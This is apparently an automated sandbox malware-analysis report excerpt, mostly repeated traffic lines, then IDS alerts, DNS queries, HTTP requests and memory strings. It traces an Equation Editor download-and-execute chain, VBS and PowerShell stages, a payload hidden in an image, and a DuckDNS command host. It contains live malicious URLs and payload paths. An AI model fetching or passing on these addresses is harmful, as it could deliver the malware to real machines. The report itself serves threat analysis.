                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443

                      Networking

                      Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2025011 ET TROJAN Powershell commands sent B64 2 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 172.67.215.45:443 -> 192.168.2.22:49168
                      Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 107.172.31.6:80 -> 192.168.2.22:49169
                      Source: TrafficSnort IDS: 2020424 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1 107.172.31.6:80 -> 192.168.2.22:49169
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 104.21.84.67 443
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
                      Source: Malware configuration extractorURLs: sembe.duckdns.org
                      Source: unknownDNS query: name: paste.ee
                      Source: unknownDNS query: name: sembe.duckdns.org
                      Source: Yara matchFile source: 10.2.powershell.exe.91e0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: global trafficTCP traffic: 192.168.2.22:49170 -> 194.187.251.115:14645
                      Source: antre.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                      Source: antre.vbs.13.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /28088/HHRM.txt HTTP/1.1Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: M247GB M247GB
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                      Source: global trafficHTTP traffic detected: GET /d/e1cCs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /28088/indexphppagenotfound.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.6Connection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2F14953-7834-4109-8F97-B0AFE5CAF451}.tmp
                      Source: global trafficHTTP traffic detected: GET /d/e1cCs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: paste.eeConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1Host: uploaddeimagens.com.br
                      Source: global trafficHTTP traffic detected: GET /28088/indexphppagenotfound.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /28088/HHRM.txt HTTP/1.1Host: 107.172.31.6Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: paste.ee
                      Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
                      Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gif
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gife
                      Source: EQNEDT32.EXE, 00000002.00000002.356926787.00000000035C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gifj
                      Source: EQNEDT32.EXE, 00000002.00000002.356769287.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.172.31.6/28088/indexphppagenotfound.gifyyC:
                      Source: wscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403573136.000000000041C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356753900.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401153718.00000000003F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.000000000040E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A64000.00000004.00000020.00020000.00000000.sdmp, indexphppagenotfound[1].gif.2.dr, coinfishingusagegirlsknow.vbs.2.drString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx
                      Source: wscript.exe, 00000005.00000002.405142889.0000000000463000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspx70
                      Source: wscript.exe, 00000005.00000003.402664845.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.401474551.0000000000454000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.405142889.0000000000454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxL
                      Source: wscript.exe, 00000005.00000003.380723170.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356767117.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.403900333.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.356796537.0000000002A83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400853574.0000000002A83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app01.system.com.br/RDWeb/Pages/login.aspxd
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.628166706.00000000007EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: RegAsm.exe, 0000000F.00000002.628166706.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp(GZ&
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: powershell.exe, 0000000A.00000002.446170067.000000000036A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000003589000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: powershell.exe, 00000008.00000002.550401395.0000000002382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: wscript.exe, 00000005.00000003.402244505.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.408615592.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.400951239.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.404645972.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.455161670.0000000004E82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
